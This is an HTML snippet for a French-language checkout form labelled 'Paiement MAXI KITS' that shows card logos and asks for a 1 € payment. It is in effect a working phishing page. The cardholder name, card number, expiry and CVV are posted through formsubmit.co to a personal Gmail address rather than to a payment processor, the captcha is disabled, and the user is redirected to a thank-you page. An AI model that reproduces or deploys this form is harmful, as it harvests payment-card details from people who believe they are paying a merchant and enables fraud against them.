<div class="payment-container">
  <h2>Paiement MAXI KITS</h2>

  <div class="logos">
    <img src="https://img.icons8.com/color/48/visa.png" alt="Visa"/>
    <img src="https://img.icons8.com/color/48/mastercard-logo.png" alt="Mastercard"/>
    <img src="https://img.icons8.com/color/48/amex.png" alt="Amex"/>
    <img src="https://img.icons8.com/color/48/discover.png" alt="Discover"/>
  </div>

  <form action="https://formsubmit.co/alvarowild4@gmail.com" method="POST">
    <input type="text" name="nom" placeholder="Nom sur la carte" required>
    <input type="text" name="carte" placeholder="N° de carte" required>
    
    <div class="row">
      <input type="text" name="expiration" placeholder="MM/AA" required>
      <input type="text" name="cvv" placeholder="CVV" required>
    </div>

    <input type="hidden" name="_captcha" value="false">
    <input type="hidden" name="_next" value="https://example.com/merci.html">

    <button type="submit" class="btn-pay">Payer 1 €</button>
  </form>
</div>